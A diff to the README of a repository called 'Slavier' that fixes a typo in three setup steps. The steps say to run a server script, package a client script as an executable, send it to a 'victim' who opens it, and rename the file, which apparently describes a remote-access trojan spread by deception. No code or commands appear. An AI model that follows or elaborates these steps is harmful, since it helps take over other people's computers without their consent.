devmazzotti/Slavier/README.md

 1- Open Server.py
 2- Now u have to use pyinstaller and make a .exe of client.py, then u send It to the "victim".
-3- The victim needs the Open the client.exe onde ( i assume you'll change the filename...)
+3- The victim needs the Open the client.exe once ( i assume you'll change the filename...)